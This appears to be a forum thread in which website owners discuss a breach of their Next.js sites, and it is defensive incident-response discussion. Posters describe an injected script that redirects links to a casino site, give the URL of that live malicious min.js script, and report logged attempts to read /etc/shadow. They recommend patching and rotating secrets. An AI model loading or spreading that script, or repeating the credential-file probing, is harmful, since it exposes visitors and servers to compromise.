here's the min.js file incase cloudflare removes it from their pages.dev domain.

i'm starting to investigate the logs and looks like some pretty suspicious activity was occurring.

here's one of the logs, it looks like a malicious user is attempting to run commands.

i'm having trouble sharing the logs, some of the files can't be uploaded presumably because they contain commands and are flagged by your firewall.

but essentially there were attempts made to scan the root directory and the etc/shadow directory at at around 2025-12-10T13:23:00 in the umami server

Hey Jowo,

I have the same issue on my website. An injected script that is replacing my external links on the website then redirect to a casino website.

Script present: https://static-6r1.pages.dev/min.js

Server header: server: railway-edge

Edge identifier: x-railway-edge: railway/europe-west4-drams3a

sorry to hear you're also encountering this issue. we're not alone, see the reddit and github links i posted above.

you should upgrade next and react ASAP and you should be able to resolve the issue.

see here: https://nextjs.org/blog/security-update-2025-12-11

i also took the extra precaution of rolling all of my app secrets incase they have been compromised - since this is a very serious vulnerability and i'm unsure at this point exactly what the scope of the breach is.

additionally i terminated the Umami analytics server/frontend/database for good measure, which was running alongside my main website.

And yeah, as mentioned i updated next, react and rolled my keys.

I also put my site into maintenance mode until i've managed to pick through the logs as best i can to figure out the extent of the breach.

Thanks, mate! My website is really simple with just a couple of page. I'm using CloudFlare but only the free version and there is nothing injected there. I'll have a look on the links and will upgrade Next.JS. Thanks a lot!